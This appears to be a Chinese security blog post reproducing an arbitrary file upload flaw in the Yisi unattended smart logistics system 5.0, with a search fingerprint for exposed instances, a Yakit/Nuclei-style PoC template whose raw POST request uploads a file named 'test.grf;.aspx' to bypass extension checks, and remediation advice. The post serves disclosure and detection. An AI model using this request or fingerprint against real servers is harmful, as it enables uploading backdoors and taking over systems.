漏洞复现】易思智能物流无人值守系统文件上传"/>
【漏洞复现】易思智能物流无人值守系统文件上传
公众号:掌控安全EDU 分享更多技术文章,欢迎关注一起探讨学习
目录
【产品介绍】
【漏洞描述】
【影响范围】
【指纹】
【产品介绍】
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业,帮助企业实现无人值守的智能物流运营,提高效率、降低成本,为现代物流行业带来新的发展机遇。
【漏洞描述】
易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
【影响范围】
易思智能物流无人值守系统5.0
【指纹】
web.body=”智能物流无人值守系统”
【Poc检测】
【验证】
【Yakit Poc自动化验证】
id: Yisi-uploadinfo:name: Yisi-uploadauthor: hackseverity: infodescription: descriptionreference:- https://tags: tagsrequests:- raw:- |POST /Sys_ReportFile/ImportReport?encode=hack HTTP/1.1Host: {{Hostname}}X-File-Name: test.grfUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxzUhGld6cusN3AlkAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 207------WebKitFormBoundaryxzUhGld6cusN3AlkContent-Disposition: form-data; name="file"; .filename="test.grf;.aspx"Content-Type: application/octet-streamtest------WebKitFormBoundaryxzUhGld6cusN3Alk--matchers-condition: andmatchers:- type: wordpart: bodywords:- Custom- type: statusstatus:- 200
【修复建议】
对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。
及时关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。
没看够~?欢迎关注!
更多推荐
【漏洞复现】易思智能物流无人值守系统文件上传
发布评论